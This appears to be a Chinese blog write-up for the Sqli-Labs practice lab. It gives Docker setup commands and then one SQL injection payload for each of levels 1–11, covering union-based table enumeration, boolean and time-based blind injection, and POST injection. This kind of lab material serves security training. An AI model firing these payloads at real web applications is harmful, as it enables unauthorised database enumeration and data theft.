Sqli-Labs 通关文档

安装【docker 版本】

拉取 sqli-labs 镜像

1	`sudo docker pull acgpiano/sqli-labs`

启动镜像

1	`sudo docker run -dt --name sqli -p 1234:80 acgpiano/sqli-labs`

在浏览器访问 1234 端口

安装完成。

Less-01

单引号闭合问题

payload:

1	`?id=-11' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- asd`

Less-02

数字型注入

payload:

1	`?id=-11 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()`

Less-03

单引号 + 小括号

payload

1	`?id=1') -- asd`

Less-04

双引号 + 小括号

payload

1	`?id=1") -- asd`

Less-05

盲注单引号闭合

payload

1	`?id=2' and if(0,1,0)-- asd`

Less-06

盲注 + 双引号闭合

payload

1	`?id=2" and if(0,1,0)-- asd`

Less-07

盲注 + 单引号+ 双层小括号闭合

payload

1	`?id=1')) and if(1,1,0) -- asd`

Less-08

盲注 + 单引号闭合

payload

1	`?id=1' and if(1,1,0) -- asd`

Less-09

时间盲注，单引号闭合

payload

1	`2' and if(1,sleep(5),0) -- asd`

Less-10

时间盲注，双引号闭合

payload

1	`1" and if(1,sleep(5),0) -- asd`

Less-11

post 注入单引号闭合

payload

1	`a' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#`

WriteUp

#网络安全 #SQL注入

Sqli-Labs 通关文档

https://blog.lixey.top/posts/879a70bf/

Author

Lixiney

Posted on

June 28, 2025

Licensed under

Python开发-Flask框架 Previous

Mysql增删改查基础 Next

Sqli-Labs 通关文档

安装 【docker 版本】

Less-01

Less-02

Less-03

Less-04

Less-05

Less-06

Less-07

Less-08

Less-09

Less-10

Less-11

安装【docker 版本】